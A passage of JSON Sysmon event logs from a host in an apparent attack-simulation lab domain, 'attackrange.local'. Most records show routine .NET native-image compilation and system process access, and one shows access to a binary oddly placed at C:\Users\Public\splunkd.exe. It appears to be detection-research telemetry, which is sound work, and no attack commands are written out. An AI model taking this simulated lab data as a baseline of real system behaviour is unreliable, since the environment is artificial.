(x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.029","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3580","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:02:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8502,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:18.154\r\nProcessGuid: {E2A3D6B1-1379-5F25-0000-00104A560F00}\r\nProcessId: 4208\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1070-0\\System.Printing.dll\r\nCreationUtcTime: 2020-08-01 07:02:18.154","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:18.154","ProcessGuid":"{E2A3D6B1-1379-5F25-0000-00104A560F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1070-0\\System.Printing.dll","CreationUtcTime":"2020-08-01 07:02:18.154","EventReceivedTime":"2020-08-01 07:02:19","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8503,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.201\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.201","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8504,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.201\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 2432\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.201","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"2432","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8505,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.201\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1353-5F25-0000-001012270E00}\r\nTargetProcessId: 1280\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.201","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1353-5F25-0000-001012270E00}","TargetProcessId":"1280","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8506,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.232\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.232","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8507,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.232\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.232","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8508,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.232\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nTargetProcessId: 3816\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:02:18.232","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","TargetProcessId":"3816","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8509,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:02:18.388\r\nProcessGuid: {E2A3D6B1-137A-5F25-0000-00108A5E0F00}\r\nProcessId: 3816\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ee8-0\\System.Reflection.Context.dll\r\nCreationUtcTime: 2020-08-01 07:02:18.388","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:02:18.388","ProcessGuid":"{E2A3D6B1-137A-5F25-0000-00108A5E0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ee8-0\\System.Reflection.Context.dll","CreationUtcTime":"2020-08-01 07:02:18.388","EventReceivedTime":"2020-08-01 07:02:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:02:18","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8510,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:02:18.435\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1367-5F25-0000-0010F6850E00}\r\nTargetProcessId: 3040\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Frame